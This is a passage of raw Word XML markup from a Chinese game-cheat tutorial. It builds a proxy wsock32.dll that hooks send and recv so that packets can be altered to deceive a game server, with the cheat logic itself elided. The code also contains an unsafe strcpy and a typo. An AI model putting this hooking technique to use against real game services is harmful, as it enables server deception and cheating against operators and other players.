          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库初始化函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>proc=GetProcAddress(hModule,"WSAStartup");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup1=(int (_stdcall *)(WORD,LPWSADATA))proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库消除函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSACleanup1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc=GetProcAddress(hModule i,"WSACleanup");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSACleanup1=(int (_stdcall *)())proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc=GetProcAddress(hModule,"socket");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket1=(SOCKET (_stdcall *)(int ,int,int))proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原创建连接函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>connect1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc=GetProcAddress(hModule,"connect");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>connect1=(int (_stdcall *)(SOCKET ,const struct sockaddr *,int ))proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原发送函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>send1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc=GetProcAddress(hModule,"send");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>send1=(int (_stdcall *)(SOCKET ,const char * ,int ,int ))proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取原接收函数的地址，并保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc=GetProcAddress(hModule,"recv");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv1=(int (_stdcall *)(SOCKET ,char FAR * ,int ,int ))proc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它获取函数地址代码略。</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else return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义库输出函数，在此可以对我们感兴趣的函数中添加外挂控制代码，在所有的输出函数的最后一步都调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的同名函数。部分输出函数定义代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库输出函数定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int PASCAL FAR WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)</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调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库初始化函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return WSAStartup1(wVersionRequired,lpWSAData);</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inSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束清除函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int PASCAL FAR WSACleanup(void)</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return WSACleanup1(); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库结束清除函数。</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创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOCKET PASCAL FAR socket (int af, int type, int protocol)</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调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return socket1(af,type,protocol);</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发送数据包函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int PASCAL FAR send(SOCKET s,const char * buf,int len,int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flags)</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在此可以对发送的缓冲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容进行修改，以实现欺骗服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　外挂代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库发送数据包函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return send1(s,buf,len,flags);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收数据包函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int PASCAL FAR recv(SOCKET s, char FAR * buf, int len, int flags)</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在此可以挡截到服务器端发送到客户端的数据包，先将其保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strcpy(buffer,buf);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包数据进行分析后，对其按照玩家的指令进行相关修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　外挂代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的接收数据包函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return recv1(s, buffer, len, flags);</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其它函数定义代码略。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件，在其中加入所有库输出函数的声明，部分声明代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LIBRARY "wsock32"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPORTS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAStartup @1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSACleanup @2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv @3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>send @4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket @5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bind @6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
